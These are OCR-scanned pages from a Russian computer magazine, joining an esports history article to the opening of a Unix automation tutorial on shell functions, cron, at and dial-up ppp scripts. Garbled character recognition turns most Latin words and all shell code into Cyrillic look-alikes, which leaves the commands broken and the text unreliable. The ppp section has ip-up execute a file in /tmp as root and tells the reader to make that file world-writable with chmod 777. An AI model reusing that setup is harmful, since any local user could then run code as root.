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Наиболее яркие киберспортивные 
ЕР8 начала 90-х: 

\Ѵо1&П8Іеіп 30 

Ооош П 
Нехеп 

Наиболее яркие киберспортивные 
КТ8 начала 90-х: 

Ѵ^агСгаЙ 



ЭКСКУРС В ИСТОРИЮ 

Никто точно нѳ возьмется сказать, когда и 
откуда впервые появилось понятие «киберс- 
порт». В конце 80-х — начале 90-х годов ста- 
ли впервые появляться компьютерные игры, 
родоначальницы основных киберспортивных 
жанров: РРЗ (шутеры от первого лица) и РГГЗ 
(стратегии в реальном времени). Отбросив 
несколько предыдущих и не столь популяр- 
ных игр, можно назвать две, от которых у бы- 
валых геймеров возникнет чувство глубокой 
ностальгии. Это трехмерная стрелялка на те- 
му уничтожения фашистов — ѴѴоІІепзІеіп 30 
и стратегическая игра Эипе II по мотивам од- 
ноименного произведения Фрэнка Герберта. 
Обе эти игры, вышедшие в 1992 году, в то 
время были безумно популярны, но еще не 
давали возможности игрокам сражаться не- 
посредственно друг с другом. В 1993 году ісі 
Зойѵѵаге выпустила Эоот — трехмерный шу- 
тер, моментально ставший хитом. У него был 
улучшенный, по сравнению с предшествен- 
никами, графический движок, но главное — 
поддерживалась игра по сети (максимум до 
четырех компьютеров, связанных через ло- 
кальную сеть или модем) как в команде, так и 
друг против друга. Игроки получили возмож- 
ность соревноваться в своем мастерстве, 
выясняя, кто быстрее, лучше, тактичнее. 
Именно с этого момента принято вести отс- 
чет эры компьютерного спорта. Аналогичным 
примером, только для жанра ВТЗ, стала 
стратегическая игра ѴѴагСгаІІ: Огсз & 

Нитапз, созданная ВІІ 22 агсІ Епіеііаіптепі: в 
1993 году, через два года после основания 
компании. Эта РГГЗ-игра была двухмерной, но 
внесла ряд нововведений в игровой процесс: 
сбор ресурсов, строительство баз и юнитов, 
деление на расы, каждая из которых облада- 
ла уникальными юнитами и зданиями, а так- 
же поэтапное развитие строительства и вет- 
ки технологий. 

К 1995 году в США начали проводиться бо- 
лее-менее серьезные турниры по компью- 
терным играм, привлекавшие как игроков, 



Наиболее яркие киберспортивные 
ЕР8 середины 90-х: 

Оиаке 

Оиаке ѴѴЪгИ 

Наиболее яркие киберспортивные 
КТ8 середины 90-х: 



так и большое количество зрителей. Те пов- 
лекли первых спонсоров, благодаря которым 
сформировались пока еще мизерные призо- 
вые фонды. В 1996 году от тогдашнего зако- 
нодателя жанра ісі ЗоІЬл/аге вышла еще одна 
культовая РРЗ-игра на полноценном трех- 
мерном движке — Оиаке (в конце 1996 года 
под нее полностью был переписан сетевой 
код, и игра превратилась в Оиаке ѴѴогІсІ). В 
августе того же года, в Гарланде (штат Те- 
хас), был проведен турнир ОиакеСоп по иг- 
рам Эоот II и Оиаке, собравший около 60 
участников. В качестве призов вручались 
майки и футболки с логотипами турнира и 
игр. Спустя несколько месяцев появилась 
первая спонсируемая киберспортивная он- 
лайновая лига РОВ, предусматривавшая рей- 
тинг участников. 

Поворотным в истории киберспорта стал 
1997 год, который ознаменовался дальней- 
шим развитием Р(31_, первым киберспортив- 
ным турниром с крупным призовым фондом, 
проведением второго турнира серии 
ОиакеСоп, а также основанием организации 
СР1_. РСІ_ получила инвестиции в размере 
двух миллионов долларов от таких компаний, 
как АІѴЮ, АТ&Т, І_одіІесН, и 113 РоЬоіісз, и 
еще год налаживала систему профессио- 
нальной киберспортивной онлайн-лиги. В 
июне 1997 года состоялся чемпионат Веб 
АппіГііІаІіоп, более известный как Реггагі 
Тоигпеу. Главным и единственным его при- 
зом был автомобиль Реггагі 328 ОТЗ 1987 го- 
да выпуска, стоимостью около $55,000, кото- 
рый был предоставлен одним из создателей 
Оиаке Джоном Кармаком. В течение следую- 
щих семи лет этот приз считался самым 
большим, когда-либо выигранным одним че- 
ловеком в истории киберспорта. Достался 
он Деннису «ТИгезИ» Фонгу, ставшему леген- 
дарной личностью в киберспорте и обыграв- 
шему на том турнире пятнадцать оппонентов. 
Именно он впервые показал на себе образ 
профессионального киберспортсмена, зара- 
батывающего на жизнь игрой. В июле 1996 



Наиболее яркие киберспортивные 
БР8 с конца 90-х по сей день: 
Оиаке II 

Оиаке III 

Осют III 
РаіпКіІІег 

Наиболее яркие киберспортивные 
КТ8 с конца 90-х по сей день: 
8іжСгай 

А§е оІ'Етрігез 
А§е оІ'Етріге8 2 

ѴѴагЬаттег 



года был проведен второй турнир серии 
ОиакеСоп, собравший рекордное количест- 
во участников — более 650 человек. Призом 
за первое место стал мощный по тем време- 
нам компьютер Репііит II 266 МНг. А чуть 
позже начала функционировать наиболее 
перспективная на сегодняшний день органи- 
зация СуЬегаФІеІю РгоІеззіопаІ І_еадие (СРІ_), 
созданная Энджелом Муньозом, которая 
проводила тогда под своей эгидой турниры 
серии Ргад. 

Все это — лишь азы киберспортивной исто- 
рии. С течением времени проводились новые 
и развивались старые чемпионаты, привле- 
кая в себя все больше игроков и спонсоров. 

КИБЕРСПОРТСМЕНЫ 

Для спонсоров подобные мероприятия стали 
маркетинговым инструментом, обеспечиваю- 
щим рекламу, а следовательно, делающим 
вложение денег выгодным. Сейчас среди 
спонсоров киберспортивных турниров выс- 
тупают такие крупные всемирно-известные 
компании, как Іпіеі, АТІ, АІѴЮ, АВІТ, пѴібіа, 
МісгозоЙ, І_одіІесИ, Затзипд, АЗІІЗ и т.д. Иг- 
ра перестала быть просто игрой в традици- 
онном понимании этого слова. Теперь это 
вид спорта, за который каждый желающий, 
приложив определенные усилия, может по- 
лучать живые деньги, соревнование между 
реальными людьми, а не с компьютером. От- 
личие рядового геймера от киберспортсмена 
заключается в целом ряде особенностей. 
Обычный геймер воспринимает игру как хоб- 
би, метод для расслабления и занятного вре- 
мяпрепровождения. Ему не важно, может ли 
кто-либо играть лучше. Для киберспортсме- 
на восприятие игры совершенно иное, он 
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Крупнейшие русскоязычные 
киберспортивные порталы: 

ѵѵѵѵѵѵ.сѵЬегТіаИІ.ги 

ѵѵѵѵѵѵ.ргоаатег.ги 

\л/ѵѵ\л/.ЫІ 22 агс].ги 

ѵѵѵѵѵѵ.ігаа.зи 

ѵѵѵѵѵѵ.аатеіпзісіе.сот 

Крупнейшие международные 
киберспортивные порталы: 

ѵѵѵѵѵѵ.зк-аатіпа.сот 

ѵѵѵѵѵѵ.аоіігаа.сот 

ѵѵѵѵѵѵ.езгеаіііѵ.сот 

ѵѵѵѵѵѵ.езпаііоп.сот 

ѵѵѵѵѵѵ.аозиаатегз.пеі 

ѵѵѵѵѵѵ.зоаатесі.сот 

ѵѵѵѵѵѵ.іеатііаиісі.пеі 



Сайты крупнейших международных турниров: 

ѵѵѵѵѵѵ.ѵѵогІсісѵЬегаатез.сот — официальный 
сайт /ѴогШ Судет багпез 
ѵѵѵѵѵѵ.жа.ги — официальный сайт МогШ 
Судет багпез Россия 
ѵѵѵѵѵѵ.ІІіесрІ.сот — официальный сайт 
Судегаідіеіе РгоІеззіопаІ іеадие 
ѵѵѵѵѵѵ.іііеѵѵеа.пеі — официальный сайт УІ/огШ 
е-Зрогіз вагпез 

ѵѵѵѵѵѵ.езѵѵогісісир.сот — официальный сайт 
ЕІесігопіс И /огШ Сир 

Сайты спонсируемых онлайн-лиг: 

ѵѵѵѵѵѵ.ааі.сот — сайт біодаі батіпд іеадие 
ѵѵѵѵѵѵ.сІапЬазе.сот — сайт СІапВазе 



всѳ время стремится доказать свое превосходство. Поэтому да- 
леко не все игровые дисциплины подходят под разряд киберс- 
портивных. Киберспортсмен, как и обычный спортсмен, для по- 
беды над другими, должен обладать высокими игровыми навыка- 
ми: скоростью, точностью, реакцией, умением молниеносно ана- 
лизировать текущую ситуацию, а также мастерством и опытом. 
Стереотип о том, что компьютерные игры — удел детей, канул в 
Лету, ведь без таланта и упорных тренировок здесь нельзя до- 
биться успехов. С ростом числа компьютерных клубов, а также 
подключенных к Интернету пользователей, значительно возрос- 
ла и конкуренция в данной сфере: стать лучшим теперь намного 
сложнее, так как общий уровень игры геймеров значительно по- 
высился. Если геймером может быть как совсем ребенок, так и 
пожилой человек, то возраст киберспортсмена обычно ограни- 
чен узкими рамками от 17 до 23 лет. У большинства людей моло- 
же 17 лет отсутствует необходимая для карьеры профессиональ- 
ного игрока способность к стратегическому мышлению, а после 
23 лет рефлексы и реакция становятся слишком медленными, 
чтобы быстро и адекватно реагировать на изменяющийся 
геймплей. Конечно, иногда встречаются и редкие исключения. 
Поэтому если ты решишь стать киберспортсменом, лучше не 
мечтай о легкой наживе. Это рутинная работа, требующая посто- 
янного совершенствования, ведь на плаву держатся только луч- 
шие из лучших. Гонорары сильнейших прогеймеров более чем 
достойны. Самый высокооплачиваемый контракт за всю исто- 
рию, заключенный с прогеймером — $180,000, плюс ежегодные 
бонусы достигают $80,000 (апрель 2005 года, Южная Корея, 
контракт телекоммуникационной компании ЗК Теіесот Т1 с про- 
геймером ЗіагСгаЙ: ВгообѴѴаг — Лим 'ЗІауегЗ_'ВохеРГ' Йо Хван). 
Максимальный выигрыш в истории киберспорта игроком за по- 
беду в одном матче — $150,000 (середина ноября 2005 года, за 
победу в финале СРІ_ ѴѴогІсІ Тоиг 2005 по РаіпКіІІег, приз достал- 
ся легендарному РРЗ-прогеймеру Джонатану 'Раіаіііу' Вэнделу). 
Эти цифры намного меньше, чем аналогичные в некоторых тра- 
диционных видах спорта, но год от года ставятся новые рекорды, 
и денежные выплаты становятся все больше. 

ЮЖНОКОРЕЙСКИЙ ФЕНОМЕН 

Южная Корея стала лидирующей страной в мире по развитию 
киберспорта. Существует несколько южнокорейских телевизи- 
онных каналов, круглосуточно транслирующих игровые матчи, 
регулярно проводятся крупные лиги с общим призовым фондом 




звезда российского 
квейка СооІІег 



Оиаке 3 — одна из самых популяр- 
ных киберспортивных игр 
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каждой около $40,000. К играм на лигах 
допускаются только прогѳймеры, кото- 
рые получают лицензии в Корейской Ки- 
берспортивной Ассоциации. Как и любой 
другой спорт, компьютерный спорт несет 
в себе элемент зрелищности, делая его 
интересным не только для самих игроков, 
но и для наблюдателей. В Корее финалы 
основных киберспортивных лиг по стра- 
тегической игре ЗІагСгаЙ: ВгообѴѴаг про- 
водятся на стадионах и в огромных залах, 
вмещающих более 100,000 зрителей. Па- 
раллельно огромная аудитория следит за 
прямой трансляцией по телевидению. 
Крупнейшие корейские корпорации (КТР, 
5К Теіесот, РапІесб&СипІеІ, Затзипд 
и др.) делают себе рекламу, создавая из 
купленных игроков свои команды. ЗіагСгаЙ 
стал там одним из национальных видов спор- 
та наряду с футболом, бейсболом и баскет- 



границ, язык геймеров понятен во всем 
мире, даже несмотря на наличие 
собственного профессионального сленга 
в различных дисциплинах. В то же время 
геймеру открывается возможность созда- 
ния/вступления в кланы и команды, кото- 
рые могут быть профессиональными и 
дружескими, онлайновыми (через Интер- 
нет) и оффлайновыми (в реале). Особен- 
ность киберспортсмена определяется не 
только его сленгом, но и такой сугубо «ин- 
тимной» вещью, как игровые девайсы. 
Каждый игрок сам выбирает себе про- 
фессиональный инструмент для достиже- 
ния цели: клавиатуру, мышь (джойстик или 
иные девайсы, например для спортивных 
симуляторов), наушники, и даже коврик 
для мыши! Из мышек у киберспортсменов 
наибольшей популярностью пользуются 
модели от І_одіІесН, МісгозоЙ и Ра гег. Ин- 



КИБЕРСПОРТ В РОССИИ 

В августе 1996 года в Москве открылся 
первый в истории нашей страны компь- 
ютерный клуб, который находился в 
подвале помещения, принадлежавшего 
винному магазину. Клуб назывался 
«Орки», на его базе впоследствии была 
создана одноименная легендарная ко- 
манда ВТЗ-игроков. В середине августа 
1996 года из двух столичных кланов 
ОІМІѴЮ (йике ІМикет Мизі Оіе) и ОпВ 
(Оиаке Ыеѵѵ Реіідіоп) образовалась од- 
на из первых российских РРЗ-команд 
йОТ (Оеѵііз Огеат Теат), которая доми- 
нировала на российской арене доволь- 
но долгое время. 27 октября того же го- 
да в Московском Физико-Техническом 
Институте состоялись соревнования по 
компьютерной игре Ооот. Турнир с 
участием восьми заядлых геймеров 




болом. Игроки команды выступают на тур- 
нирах в спонсорской униформе и участ- 
вуют во всевозможных промо- и реклам- 
ных акциях, привлекая потребителей. 
В свою очередь, спонсируемая команда 
предоставляет игрокам заработную пла- 
ту, условия для проживания, питания 
и тренировок в командных апартамен- 
тах. Менеджеры команд следят за гра- 
фиком тренировок игроков (некоторые 
перед важными матчами тренируются 
практически круглосуточно) и их успеха- 
ми. Существует и трансферный рынок: 
контракты наиболее успешных прогей- 
меров могут перекупаться за большие 
деньги другими командами. Что касает- 
ся самих прогеймеров, то они становят- 
ся звездами национального масштаба 
со своими фан-клубами, насчитывающи- 
ми до 600 тысяч человек. 

ПЛЮСЫ И МИНУСЫ 

Возможность зарабатывать деньги игрой 
и при этом стать известным в определен- 
ных кругах привлекает многих. Но боль- 
шая часть людей останавливается на пол- 
пути, не выдержав реальной нагрузки. Иг- 
ра перестает приносить удовольствие. Ра- 
ди тренировок приходится жертвовать 
всем: работой, учебой, отношениями с 
родными и близкими, личной жизнью. Вза- 
мен киберспортсмен получает чувство 
принадлежности к таким естественным 
формированиям, как игровое и киберс- 
портивное комьюнити. Для такого сооб- 
щества не существует территориальных 



дивидуальны и системные настройки, та- 
кие как чувствительность мыши, конфиги 
и т.п. Любой киберспортсмен должен хо- 
рошо разбираться в компьютерах и но- 
вейших технологиях. Сама игра обеспечи- 
вает играющему и зрителям незабывае- 
мые эмоции, всплеск адреналина. Сходи 
на любой киберспортивный турнир, и ты в 
полной мере ощутишь совершенно новую 
культуру, незнакомую человеку, далекому 
от компьютерного спорта. Немаловажным 
фактором, привлекающим игроков в кибе- 
рспорт, является общение и обмен опы- 
том с игроками из других стран, а также 
возможность путешествовать по миру. 
Геймеры находят спонсоров, оплачиваю- 
щих поездки на крупные международные 
турниры, проводящиеся в различных 
странах, и оправдывают вложенные сред- 
ства достойным выступлением. У самых 
крупных турниров существует система на- 
циональных отборочных игр в странах, по- 
бедители которых, помимо денежного 
приза, получают оплачиваемую путевку на 
финал в другую страну (примерами могут 
служить турниры ѴѴЕО, АСОІМ, ѴѴСѲ, 
ЕЗѴѴС и др.). Главные минусы состоят в 
том, что можно серьезно подорвать здо- 
ровье и нервную систему (в Южной Корее 
известны случаи летального исхода после 
многочасовой игры геймеров в компью- 
терных клубах без перерыва, еды и отды- 
ха). А так же финансовые затраты: покуп- 
ка девайсов, плата регистрационных 
взносов на турнирах и большие усилия 
для нахождения спонсоров. 



проводился по круговой системе и 
впервые собрал большое количество 
зрителей. С этого начиналось форми- 
рование российских ПТЗ- и РРЗ-школ. 
Геймеры приходили и уходили, а опыт 
передавался из поколения в поколение. 
Тем не менее доминировали игроки 
Москвы и Санкт-Петербурга, время от 
времени выяснявшие отношения между 
собой. С появлением компьютерных 
клубов в России стала популярна игра 
по Сети, которая ранее не была доступ- 
на из-за отвратительного подключения 
к Интернету. Проводились соревнова- 
ния, где первые геймеры сами прокла- 
дывали себе дорогу к победам, им было 
некому подражать. С появлением воз- 
можности просмотра демок (сохранен- 
ных записей игры), каждый новичок мог 
смотреть на игру сильных прогеймеров 
и, копируя их действия, самостоятельно 
совершенствоваться. Однако развитие 
киберспорта в России шло заметно 
медленнее, чем за рубежом. Советские 
стереотипы несерьезности игрушек и 
плохая экономическая ситуация в стра- 
не не позволяли геймерам сделать свое 
комьюнити профессиональным. Награ- 
дой за победы было уважение со сторо- 
ны других игроков, но о финансовом 
поощрении речи даже не шло. Потре- 
бовалось несколько лет, чтобы рос- 
сийский киберспорт выбрался из ан- 
деграунда, и на него обратили внима- 
ние люди, способные помочь дальней- 
шему развитию. 
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К 2000 году в России стали проводиться пер- 
вые чемпионаты с достойными призовыми 
фондами и спонсорством. А спустя еще год 
власть услышала и признала российских ки- 
бератлетов, включив компьютерный спорт 
в список рекомендуемых для развития в РФ. 
Позже стали возникать всевозможные неза- 
висимые киберспортивные организации, так 
или иначе способствовавшие продвижению 
компьютерного спорта в нашей стране. Сей- 
час киберспортивные турниры привлекают 
все большее внимание СМИ и проходят при 
поддержке властей. 

ѴѴ0Ш.0 СУВЕР САМЕ5 

Говоря об истории киберспорта и возмож- 
ностях, которые он открывает перед игрока- 
ми, следует упомянуть ежегодно проводя- 
щиеся с 2001 года ѴѴогІсІ СуЬег Сатез — 
«Олимпийские игры» по компьютерному 
спорту, с системой национальных и регио- 
нальных отборочных туров. За прошедшее 
время турнир стал крупнейшим в мире фес- 
тивалем видео- и компьютерных игр, при- 
нявшим на гранд финал 2005 года в Синга- 
пуре (6 — 20 ноября) свыше 800 игроков, по- 
бедивших на отборочных в различных дис- 
циплинах в 70 странах мира. С момента по- 
явления турнира гранд финалы с 2000 по 

2003 год проводились в Южной Корее, а в 

2004 году был впервые проведен за ее пре- 
делами — в городе Сан-Франциско (США). 
Его общий призовой фонд в этом году сос- 
тавил более $400,000. Столицей гранд-фи- 
нала ѴѴСС 2006 был признан итальянский 
город Монца, известный своим автодромом 
Формулы-1, где и будут проходить игры. 
ѴѴСС дает прекрасный шанс реализоваться 
талантливым игрокам. Выбери одну из офи- 
циальных киберспортивных дисциплин (в 

2005 году на российских отборочных это 
были: Соипіег-Зігіке: Зоигсе, РІРА Зоссег 
2005, ІХІеесІ Іог ЗреесІ: ІІпбегдгоипсІ 2, 
ЗіагСгаЙ: ВгоосІ ѴѴаг, ѴѴагСгаІІ III: ТИе Ргогеп 
ТИгопе, ѴѴагИаттег 40к: Оаѵѵп оі ѴѴаг), кото- 
рые будут опубликованы весной следующе- 
го года, тренируйся, побеждай у себя в ре- 
гионе, а затем на российском финале в 
Москве. И вот ты уже в Италии. Если на За- 
паде начинающих игроков объединяет Ин- 
тернет, то у нас главными центрами разви- 
тия киберспорта остаются компьютерные 
клубы. Причины тому — качество и стои- 
мость выхода во всемирную Сеть. ѴѴСС да- 
ют игрокам всех регионов шанс встретиться 
с сильнейшими прогеймерами и доказать, 
что свои таланты есть не только в Москве 
или Санкт-Петербурге. По каждой дисцип- 
лине в следующем году от России будет отп- 
равлено несколько игроков, их количество 
определяется квотами, выделяемыми орга- 
низаторами стран для участия в гранд-фи- 
нале. Приглядись к логотипу ѴѴСС, на кото- 
ром изображены знакомые олимпийские 
кольца. Посмотри, кто является генераль- 
ным спонсором, — компания Затзипд 




трансляция чампа по Рііа на ѴѴСС 



Феррари, которую выиграл легендарный ТИгезИ 



Еіесігопісз, которая спонсирует Олимпийс- 
кие игры, и ты поймешь, что официальный 
слоган турнира «Больше, чем игра» — не 
пустые слова. Призовой фонд российского 
отборочного турнира составил в этом году 
$100,000, из них $25,000 пришлось на реги- 
оны, $60,000 — на финал в Москве, а 
$15,000 было затрачено на подготовку кибе- 
рсборной России. 

В последние годы российские игроки ста- 
бильно входили в число претендентов на 
высшие награды. Первые большие успехи к 
россиянам пришли уже на турнире в 2001 
году, когда игрок под ником І_еХеВ, успешно 
выступающий на международных турнирах и 
по сей день, выиграл серебряную медаль по 
Оиаке III. На мировом финале в 2002 году, 
россияне выиграли соревнования в трех 
дисциплинах: Оиаке III Іѵі (Алексей "иІЧкіпсІ" 
Смаев), Оиаке III 2ѵ2 (ипКіпсІ & СооІІег) и 
Соипіег Зігіке (легендарная питерская ко- 
манда М19), и по общей сумме призовых 
обошли даже хозяев турнира — корейцев. 
Особого внимания заслуживает самая попу- 
лярная на сегодняшний день в России дис- 
циплина — Соипіег-Зігіке: в ней российские 
игроки являются одними из мировых лиде- 
ров и поднимаются на пьедестал почета 
крупнейших соревнований. В других дис- 
циплинах российские геймеры также регу- 
лярно входят в число призеров. 

ИНФОРМАЦИОННОЕ ОСВЕЩЕНИЕ 

Киберспортивные события в полной мере ос- 
вещаются на страницах российских и между- 
народных порталов. Крупнейшим по содер- 
жанию и посещаемости порталом на терри- 
тории России и стран СНГ уже несколько 
лет является ежедневный киберспортивный 
дайджест — СѵЬегРіаШРи . На его страницах 
можно узнать всю последнюю информацию 
из мира компьютерного спорта, прочитать 
актуальные авторские статьи, колонки. Сайт 
предоставляет возможность посетителям 
вживую следить за ходом крупнейших кибе- 
рспортивных турниров и просматривать 
эксклюзивный фотоматериал, обеспечивая 
их прямыми репортажами. Для игроков дос- 
тупна регулярно обновляемая база демоза- 
писей игр в различных дисциплинах, а так- 
же расписание всех предстоящих турниров 
в различных городах России. 

Под эгидой сайта ежеквартально проводят- 
ся крупнейшие на территории постсоветс- 
кого пространства (после ѴѴСС) турниры се- 
рии АЗІІЗ Ореп. Совсем недавно, в конце 
ноября 2005 года, завершился очередной 
турнир серии — АЗІІЗ Аиіитп 2005, собрав- 
ший на финале свыше 800 игроков из Рос- 
сии и соседних стран. Общий призовой 
фонд в девяти игровых дисциплинах соста- 
вил свыше 400 тысяч рублей! В 2006 году 
турнирная серия будет развиваться и полу- 
чит статус международной, а призовой фонд 
продолжит увеличиваться. 

ВШАПѴ ѴОІЖ’8 ЦЦ 



самый известный русский киберспортивный 
журналист Роіозаііу 
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ІІЫІХОЮ 




техт л м / л м@ызт.гш / 



ЗАВОДНОЙ 

пингвин 



АВТОМАТИЗИРУЕМ 

РУТИННУЮ 

РАБОТУ 



ІІ ОСОЗНАНИЕ НЕОБХОДИМОС- 
ТИ ИЗО ДНЯ В ДЕНЬ НАБИРАТЬ ОД- 
НОТИПНЫЕ КОМАНДЫ И ВЫПОЛ- 
НЯТЬ РУТИННЫЕ ОПЕРАЦИИ МО- 
ЖЕТ ВВЕСТИ В УНЫНИЕ ЛЮБОГО 
ЮНИКСОИДА. НО НЕ СТОИТ ОТЧАИ- 
ВАТЬСЯ, *І\ІІХ МОЖЕТ ВЗЯТЬ БОЛЬ- 
ШУЮ ЧАСТЬ РАБОТЫ НА СЕБЯ. МНО- 
ГИЕ КОМПОНЕНТЫ ОС КАК БЫ СА- 
МИ НАМЕКАЮТ, ЧТОБЫ ИХ ИСПОЛЬ- 
ЗОВАЛИ В СКРИПТАХ И ЗАДАНИЯХ 
ПЛАНИРОВЩИКА. ЧИТАЙ ДАЛЬШЕ, 
И ТЫ УЗНАЕШЬ, КАК СБЕРЕЧЬ СВОЕ 
ВРЕМЯ, ЗАСТАВИВ ОПЕРАЦИОНКУ 
ВЫПОЛНЯТЬ ТВОЮ РАБОТУ рр 

ИСПОЛЬЗУЙ СКРИПТЫ, люк 

Первый шаг к автоматизации — написание 
скриптов. Если освоить хотя бы азы шелл- 
скриптинга, то считай, что половина дела 
уже сделана. Чтобы не загромождать систе- 
му скриптами в одну-две строки, можно при- 
бегнуть к помощи функций, определенных в 
/еіс/ргоіііе или ~/. Ьазіігс , тем более что со 
стороны пользователя они ничем не будут 
отличаться от скриптов. Смотри скрипт 1 . 

Это только пример, показывающий удобство 
использования вспомогательных функций. 

Ты не должен сразу ринуться вбивать их все 
в Ьазіігс , наоборот, подумай, какие после- 
довательности команд ты часто используешь 
(и насколько это утомительно), а затем 
оформи их в виде функций или скриптов. 

ОСВОЙ ПЛАНИРОВЩИК 

Твоими лучшими друзьями на пути к тотальной 
автоматизации могут стать сгоп и аі. Именно 
они ответственны за запуск процессов в фоне. 
Демон сгоп с давних времен используется в 
*піх-системах в качестве планировщика за- 
даний. Если определенная команда должна 
запускаться с заданным интервалом време- 
ни (каждый час, каждую ночь, каждый ме- 
сяц), то лучшего средства, чем сгоп для осу- 
ществления этой задачи не найти. Напри- 
мер, мы хотим, чтобы каждый день ровно в 
семь часов вечера запускался наш скрипт. 
Создаем в домашнем каталоге файл 
-/.сгопІаЬ с таким содержимым: 

0 19 

/изг/Ьі п/оиг-зсгі рѣ 




файл /ѵаг/зрооІ/сгоп/сгопІаЬз/гооІ из ЗІаскѵѵаге 



Загадочные числа и звездочки перед именем 
скрипта означают время его запуска в таком 
порядке: минута, час, день, месяц, день неде- 
ли. Звездочки вместо дня и месяца означают, 
что скрипт должен выполняться каждый день 
месяца. Теперь выполняем команду: 

$ сгопіаЬ -/.сгопіаЬ 

Осталось только дождаться 19:00 и полюбо- 
ваться результатом. Несколько замечаний: 

1 Прописанные в сгопІаЬ команды исполняются 
интерпретатором /Ып/зіі с тремя заданными пе- 
ременными окружения: ІІЗЕВ, НОМЕ и ЗНЕІ_І_. 
Так как переменная РАТН не определена, ты 
должен указывать полный путь к бинарнику. 

2 Если настроена локальная почтовая сис- 



тема, то весь вывод команды отправляется 
пользователю в письме. 

Для выполнения только одного-двух зада- 
ний функциональность сгоп может ока- 
заться избыточной. В этом случае лучше 
прибегнуть к помощи команды аі. Он как 
раз предназначен для однократного вы- 
полнения задания и внутренне устроен го- 
раздо проще. Для примера запустим тот 
же скрипт в то же время: 

$ аі 19:00 

аІ> /изг/Ьіп/оиг-8СгірІ 
СТРЬ-Ц 



Очень просто и красиво, не правда ли? 




ІОО 
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# ѵі -/.Ьазіігс 

# создание Іаг.Ь22-архива каталога 
Іипсііоп \Ьт2{) { 

ІІ [ $# != О ]; ІИеп 

Іаг сѵ $1 I Ьгір2 -9с т > $1 .Іаг.Ьг2 
Гі 

# распаковка Іаг.Ь22-архива 
Іипсііоп иІЬ22() { 

ІІ [ $# != О ]; ІІіеп 

гаг х\\/і $1 
ІІ 

# «умное» выдвижение лотка СЭ-ЯОМ 
іипсііоп еіесІсб() { 

ІосаІ сбгот=/тпІ/сбгот 
Ізоі $ссІгот 

i I [ $? -пе 0 ]; ІІіеп 

фсі $ссІгот 
Іі 

№ создание образа СО 
іипсііоп ссІітдО { 

ІосаІ сбгот=/тпІ/сбгот 

ii [ $# != О ]; ІІіеп 

бб сопѵ=поеггог іі=/беѵ/сбгот оі=$1.ітд 
Іі 

# перекодирование аудиодиска в одд ѵогЫз 
іипсііоп сбодд() { 

сбрагапоіа -В 
іог ѵѵаѵ іп Ігаск*.ѵѵаѵ; бо 
оддепс $ѵѵаѵ 
гт -і $ѵѵаѵ 

бопе 

# поиск файла по шаблону 
іипсііоп іі() { 

ііпб . -Іуре I -іпате \*$1\* -Із ; 

№ приведение имени файла к нижнему регистру 
іипсііоп Ісазе() { 

іі [ $# != О ]; ІГіеп 

тѵ $1 'есГю $1 I Іг фиррег:] 1 фіоѵѵег:] 1 ' 

II 

# установка заголовка хіегт 
іипсііоп хіііІе() { 

іі [ $# != О ]; ІІіеп 

есИо -е "\033]0;$1\007" 

ІІ 

№ создание снимка рабочего стола 
іипсііоп ззіюі() { 

ітрогі -ѵѵіпбоѵѵ гооі -/зсгеепзГюі.рпд 



по поводу 55Н-ИИИИ 

1 . В8 О -системы обычно комплектуются программой 
сигі, во многом схожей по функциональности с лѵ§еГ. 

2. Демон ррр, работающий в пространстве 
пользователя, после установки соединения запускает 
файл / егс / ррр /ррр .Ііпкир . 




Время исполнения можно назначить на любой день, используя 
такой формат: «а! час:минута /месяц/день/год». Еще мне нравится 
вот такой стиль указания времени: «а! поѵѵ + 2 Иоигз» — выпол- 
нить команду через 2 часа, «а! поѵѵ + 1 бау2» — на следующий 
день. Как и сгоп, а! может позаботиться о том, чтобы пользова- 
тель получил уведомление о выполненном задании по почте. 

Для удаления ненужного задания посмотри его идентификатор 
в списке заданий (команда аф), а затем используй команду 
«аігт идентификатор» для удаления. 

АВТОМАТИЗИРУЙ 

ИНТЕРНЕТ-СОЕДИНЕНИЯ 

Пришло время автоматизировать твои многочисленные интернет-сое- 
динения. Скажу сразу, что этот раздел будет полезен только для диа- 
лапщиков. Причины просты. Владельцам выделенных линий ничего 
автоматизировать не надо, соединение с сетью инициализируется на 
этапе загрузки ОС без участия пользователя. С другой стороны, 
«счастливым» обладателям модемов приходится не только ограничи- 
вать время, проведенное в инете (поминутная тарификация), но и к 
тому же отодвигать его поближе к ночи (дешевле). Выход: заставить 
ОС звонить ночью провайдеру и забирать почту и нужные файлы. 
Предлагаю твоему вниманию одно из возможных решений. Открыва- 
ем файл /еіс/ррр/ір-ир и пишем в него следующее: 



# ѵі /еіс/ррр/ір-ир 

#!/Ьіп/зГі 

# отправляем почту (только если у тебя установлен локальный почтовый сервер) 
/изг/зЬіп/зепбтаіІ -ц 

# запускаем файл /ітр/ррр-аиіо 
ІІ [ -х /Ітр/ррр-аиіо ]; ІГіеп 

/Ітр/ррр-аиіо 

# удаляем уже ненужный файл 
гт -I /Ітр/ррр-аиіо 

# отключаемся 
/изг/зЬіп/ррр-оІІ 

II 



Вместо строки /изг/зЫп/ррр-оіі пропиши команду, с помощью кото- 
рой ты отключаешься от сети. Если демон рррб найдет файл 
/Ітр/ррр-аиіо, он его выполнит и разорвет соединение. Теперь соз- 
дадим шаблон файла ррр-аиіо: 



# ѵі ~/ррр-аи1о 

#!/Ып/зГі 

# файл исполняется от рута, а наши команды должны исполняться от обычного 
пользователя 

/Ып/зи — имя_пользователя 

# забираем почту 
ІеІсГітаіІ 

# переходим в специальный каталог 
об -/боѵѵпіоаб 

# скачиваем нужные файлы 
ѵѵдеі Ир://... 

ѵѵдеі ГіІІр://... 
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ІІІЧІХОЮ ///// І551ІЕ 




Установи полные права на этот файл: 



$ сіітосі 777 ~/ррр-аиІо 



Все. Теперь тебе нужно его заполнить, скопировать в каталог Дтр и 
назначить время соединения с помощью ай 



$ ср ~/ррр-аиІо /Ітр/ррр-аиіо 
$аІ 02:10 

аІ> /изг/зЬіп/ррр-оп 

Замени /изг/зЫп/ррр-оп на команду, с помощью которой ты устанав- 
ливаешь соединение. Обрати внимание, что такие команды обычно 
требуют привилегий гооі, поэтому можно: а) настроить зисіо (см. ни- 
же) или б) запустить аХ от гооі'а. 

Конечно, решение несколько топорное, но зато очень простое. 

В данном случае хорошим дополнением может стать запись результа- 
тов выполнения команд в файл и отправка его по почте с помощью 
команды /изг/Ып/таіІ (или таііх). 

НЕ ПРИВЫКАЙ К БРАУЗЕРУ 

С соединением разобрались, теперь поговорим об автоматическом 
скачивании файлов. Для начала попробуем заставить Йр-кпиент ра- 
ботать в автономном режиме. Для осуществления задуманного нам 
